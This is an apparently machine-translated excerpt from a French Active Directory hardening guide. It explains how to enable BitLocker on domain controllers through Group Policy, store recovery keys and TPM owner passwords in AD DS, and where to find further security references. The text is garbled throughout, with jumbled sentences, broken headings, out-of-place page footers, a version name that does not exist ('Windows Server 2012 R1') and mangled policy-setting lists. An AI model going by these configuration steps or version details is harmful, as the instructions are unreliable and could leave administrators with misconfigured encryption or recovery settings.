http://technet.microsoft.com/fr-fr/library/dd875547(v=ws.10).aspx
http://technet.microsoft.com/en-us/library/jj679890.aspx http: // technet .Microsoft.com /
en-us / library / hh831412.aspx

The first step is to install the feature BitLocker on a domain controller (physical machine or virtual machine). A restart will be required. For more
information : http://technet.microsoft.com/fr-fr/library/jj612864.aspx

Then you change the GPO Default Domain Controller Policy to properly configure BitLocker. Go in Computer Configuration | Administrative
Templates | Windows Components | BitLocker Drive Encryption to show the policy settings | Provide the single identifiers for your organization. Enable
this setting and select the following settings:

• BitLocker Identification Field: 14127487


• Allowed BitLocker Identification Field: 14127487
This parameter allows a Data Recovery Agent encrypted with BitLocker ( not implemented in this procedure). I invite you usually use the Siret
number of the company as a business identifier.

Go in Computer Configuration | Policies | Administrative Templates | Windows Components | BitLocker Drive Encryption | Operating System
Drives | Require additional authentication at startup.
Enable GPO setting with the following configuration: Check the box Allow BitLocker
without a TPM-compatible.
Select the following choices:
allow TPM
Do not allow startup PIN with TPM Do not allow startup Key
with TPM Do not allow startup PIN with TPM and Key

Msreport - Guillaume MATHIEU - All rights reserved


To secure the hard drive system of physical domain controllers, use BitLocker with storage of encryption keys in the TPM ( Trusted Platform
Module). Using a TPM will also enable the SecureBoot ( protection of the boot files). No password will be required to start.

To secure the hard drive system of the virtual domain controllers, use BitLocker with a startup password. Current virtualization solutions do not
natively emulate a TPM and complex it is to emulate a USB key on a virtual machine. The administration teams will therefore have access to
the console of virtualization solution (Hyper-V, VMware, ...) to restart the domain controllers because they will enter a BitLocker password at
startup.

Go in Computer Configuration | Policies | Administrative Templates | Windows Components | BitLocker Drive Encryption | Operating System
Drives | Choose how BitLocker-protected operating system drive can be: recovered.

Enable GPO setting with the following configuration: Uncheck the box Allow data
recovery agent
Check the box Omit recovery options from the BitLocker setup wizard
Check the box Save BitLocker recovery information to AD DS.
To select Store recovery passwords and key packages
Check the box Do not enable BitLocker recovery information is up to Stored to AD DS for operating system drive

These settings allow you to force the backup key recovery BitLocker in the Active Directory.

Msreport - Guillaume MATHIEU - All rights reserved


This parameter forces safeguarding the TPM owner password in Active Directory. Note that the method of storage of TPM owner passwords
changed with Windows Server 2012 R1 and Windows 8. The diagram should be prepared for Windows 2012 R1.

Platform Module Services | Turn on TPM backup to Active Directory Domain Services.

Msreport - Guillaume MATHIEU - All rights reserved Go Computer Configuration | Policies | Administrative Templates | System | Trusted
configuration below.

Force replication (NTDS / DFS-R) to all domain controllers and then run the gpupdate / force command on your domain controllers.

Add rights in the directory to update the password for the TPM owner. As explained in the TechNet article http://technet.microsoft.com/fr-fr/library/dd875529(v=ws.10)
It is necessary to use the script Add-TPMSelfWriteACE.vbs in order to allow registration of the password TPM owner in the attribute msTPM-OwnerInformation.

By default only members of the group users Domain Admins have the right to view:
• The BitLocker Recovery Key
• The Trusted Platform Module (TPM) owner password

It is possible to use the script Get-TPMOwnerInfo.vbs to view Trusted Platform Module (TPM) owner password or use the script Get-BitLockerRecoveryInfo.vbs
to view the
BitLocker Recovery Key.

You can now turn BitLocker your physical or virtual domain controller at the control panel. In our case, the domain controller is running Windows
2012 R2. The Active Directory database (Ntds.dit) and the SYSVOL directory are hosted on the system disk.

Msreport - Guillaume MATHIEU - All rights reserved Enabling this setting GPO with the
Msreport - Guillaume MATHIEU - All rights reserved
the computer account. To do this, press ESC.

From other domain controller, start the console Active Directory Users and Computers.
Skip mode console Advanced Features and Users, Contacts, and Computers as containers.
Go to the properties of the domain controller computer account.

Msreport - Guillaume MATHIEU - All rights reserved If you have forgotten the password BitLocker, you can use the recovery key that is stored at
Msreport - Guillaume MATHIEU - All rights reserved
8.3 REFERENCES:

8.3.1 DRUNK RECOMMENDS

I invite you to read the book on Hacking techniques Jon Erickson edited by PEARSON.
This book will help you understand the main attack and to write scripts for basic attacks.

8.3.2 M A ICROSOFT CTIVE D irectory T echnical S PECIFICATION

Microsoft provides on MSDN the technical specification Active Directory. The reading of paragraph 5 Security is essential to understand how a
secure Active Directory. To download this guide in PDF format (English):

http://msdn.microsoft.com/en-us/library/cc223122.aspx

8.3.3 P OUR UNDERSTANDING NTLM PROTOCOL AND WITH A K ERBEROS CTIVE D irectory

I invite you to read these two documents are very complete, very clear and French. Thank you, among other Aurelien BORDES for clarity of
explanation.
https://www.sstic.org/media/SSTIC2007/SSTIC-
acts / Secrets_d_authentification_sous_Windows /
SSTIC2007-ArticleSecrets_d_authentification_sous_Windows-bordes.pdf
http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-
_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf

8.3.4 L ES R RECOMMENDATIONS ON THE SAFETY OF CTIVE irectory OF ANSII

The ANSII (National Agency of computer security) wrote a very comprehensive document on safety recommendations for Active Directory. Many
elements of this book
are from of these recommendations:
http://www.ssi.gouv.fr/IMG/pdf/NP_ActiveDirectory_NoteTech.pdf

Other guides are available on the site:


http://www.ssi.gouv.fr/fr/guides-et-bonnes-pratiques/recommandations-et-guides/

8.3.5 R ECOMMENDATION M ICROSOFT SAFETY OF A DIRECTORY OF CTIVE irectory

Microsoft has written a comprehensive document on security recommendations for Active Directory that can be downloaded from one of the two
links below:
http://www.microsoft.com/en-us/download/details.aspx?id=38785 http://aka.ms/bpsad .

8.3.6 R RECOMMENDATION ON SETTING SERVICE T erminal S erver

This document explains the inner workings of the RDP, its evolution and how to configure it securely:

https://www.sstic.org/media/SSTIC2012/SSTIC-actes/securite_rdp/SSTIC2012-Article-securite_rdpebalard_bordes_rigo_2.pdf

8.3.7 A THER LINKS

I invite you to read these two documents on the attack Pass The NTLM Hash:
http://www.microsoft.com/en-us/download/details.aspx?id=36036
http://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283

Msreport - Guillaume MATHIEU - All rights reserved

Das könnte Ihnen auch gefallen